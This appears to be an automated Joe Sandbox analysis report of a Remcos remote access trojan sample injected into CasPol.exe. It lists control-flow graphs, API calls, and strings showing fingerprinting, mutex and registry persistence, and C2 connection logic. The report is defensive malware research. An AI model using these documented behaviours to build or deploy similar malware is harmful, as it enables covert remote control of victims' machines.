                                                                                                            • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                            APIs
                                                                                                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 4229901323-0
                                                                                                            • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                            • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 80 40d9a5-40d9ac call 40bed7 69->80 81 40d96d-40d98c call 401e8f call 4124b7 69->81 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 80->90 91 40d9ae-40d9b0 80->91 81->80 98 40d98e-40d9a4 call 401e8f call 412902 81->98 95 40d9c0-40d9cc call 41a473 90->95 96 40d9be 90->96 94 40dc95 91->94 94->49 103 40d9d5-40d9d9 95->103 104 40d9ce-40d9d0 95->104 96->95 98->80 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 166 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 166->222 170 40dbb1-40dbbb call 4082d7 167->170 171 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->171 178 40dbc0-40dbe4 call 4022f8 call 4338d8 170->178 171->178 198 40dbf3 178->198 199 40dbe6-40dbf1 call 436060 178->199 191->163 201 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->201 199->201 259 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 201->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 259->222 272 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 259->272 272->222 292 40dc93 272->292 276 40dd81 273->276 277 40dd7d-40dd7f 273->277 275 40dd60-40dd77 call 41bec0 CreateThread 274->275 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->94 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 343 40def9-40df0c call 401d64 call 401e8f 333->343 344 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 333->344 354 40df6c-40df7f call 401d64 call 401e8f 343->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->355 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->102 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                            • API String ID: 2830904901-3665108517
                                                                                                            • Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                                                                                                            • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                            • Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                                                                                                            • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a696 560->566 579 4142dd-4142df 565->579 566->583 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 579->582 579->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 905 414ad2-414ad4 901->905 903 414ae4-414ae9 call 40a767 902->903 904 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->904 903->904 916 414b22-414b2e CreateThread 904->916 917 414b34-414b4f call 401eea * 2 call 401e13 904->917 905->902 916->917 917->583
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                            • API String ID: 524882891-2450167416
                                                                                                            • Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                                                                                                            • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                            • Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                                                                                                            • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                            • API String ID: 994465650-2151626615
                                                                                                            • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                                                                                                            • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                            • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                                                                                                            • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3658366068-0
                                                                                                            • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                                                                                                            • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                            • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                                                                                                            • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac1f 1019->1026 1027 40c8da-40c8e8 call 41a75b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b16b 1019->1030 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1032 40c9dd-40c9e2 call 43ac1f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1050 40c8ed 1027->1050 1028->1032 1029->1032 1042 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1042 1043 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1043 1044 40c9e3-40c9e8 call 4082d7 1032->1044 1038->1025 1038->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath
                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                            • API String ID: 82841172-425784914
                                                                                                            • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                                                                                                            • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                            • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                                                                                                            • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                            • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 1866151309-3211212173
                                                                                                            • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                                                                                                            • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                            • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                                                                                                            • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1173 412724-412730 call 401eea 1170->1173 1171->1173
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                            • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: HgF$pth_unenc
                                                                                                            • API String ID: 1818849710-3662775637
                                                                                                            • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                            • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                            • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: TUF
                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                            • String ID: (CG
                                                                                                            • API String ID: 1925916568-4210230975
                                                                                                            • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
